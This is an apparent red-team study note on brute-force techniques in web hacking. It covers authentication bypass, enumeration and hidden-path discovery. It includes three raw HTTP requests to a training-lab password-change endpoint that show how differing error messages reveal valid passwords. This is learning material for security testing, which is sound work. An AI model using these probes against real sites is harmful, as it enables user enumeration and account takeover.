RedTeam
3.Web-Hacking
5.Others
Brute Force

What is Brute Force

Brute force isn't limited to password guessing—it can be used strategically in other contexts to exploit vulnerabilities or amplify weaknesses, such as:

  1. Authentication Bypass: Exploiting weak login mechanisms without proper protections.
  2. Rate-Limiting Issues: Identifying systems that allow unlimited attempts without detection or restriction.
  3. Enumeration: Discovering valid usernames, tokens, or session IDs by analyzing variations in responses.
  4. Hidden Resource Discovery: Brute-forcing directories, files, or endpoints to reveal sensitive resources (e.g., /admin, /backup.zip).
  5. Exploiting Discrepancies Between Requests: When error messages or response behaviors differ based on input (e.g., old password validity in a password change flow), brute force can be used to test combinations systematically and uncover valuable information.

Brute force becomes especially potent when used in conjunction with other vulnerabilities, such as response discrepancies or insufficient error handling, to deepen the scope of an attack.

Discrepancies Between Requests: Analyzing Password Change Flows

Test password change flows by checking for discrepancies in error messages: use an incorrect old password and mismatched new passwords to observe responses. Alter the username to test for user enumeration vulnerabilities—if the old password is valid for the chosen user, the error may shift to new password mismatch, revealing sensitive information.

# Example 1 ---> Wrong same password

POST /my-account/change-password HTTP/2
Host: lab.web-security-academy.net
Cookie: session=1svjSNn6Uzjw01voAyRV4F9pwBCSsv4B
Content-Length: 77
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8

username=USER&current-password=ABC&new-password-1=123&new-password-2=098
---------------------------------------------------------------------------------
# Example 2  ---> Wrong valid password

POST /my-account/change-password HTTP/2
Host: lab.web-security-academy.net
Cookie: session=1svjSNn6Uzjw01voAyRV4F9pwBCSsv4B
Content-Length: 77
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8

username=USER&current-password=NOTABC&new-password-1=123&new-password-2=123

----------------------------------------------------------------------------------
# Example 2  ---> Wrong valid password (No erros regarding missmatch of new pass)

POST /my-account/change-password HTTP/2
Host: lab.web-security-academy.net
Cookie: session=1svjSNn6Uzjw01voAyRV4F9pwBCSsv4B
Content-Length: 77
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8

username=USER&current-password=NOTABC&new-password-1=123&new-password-2=098
APIClick Jaking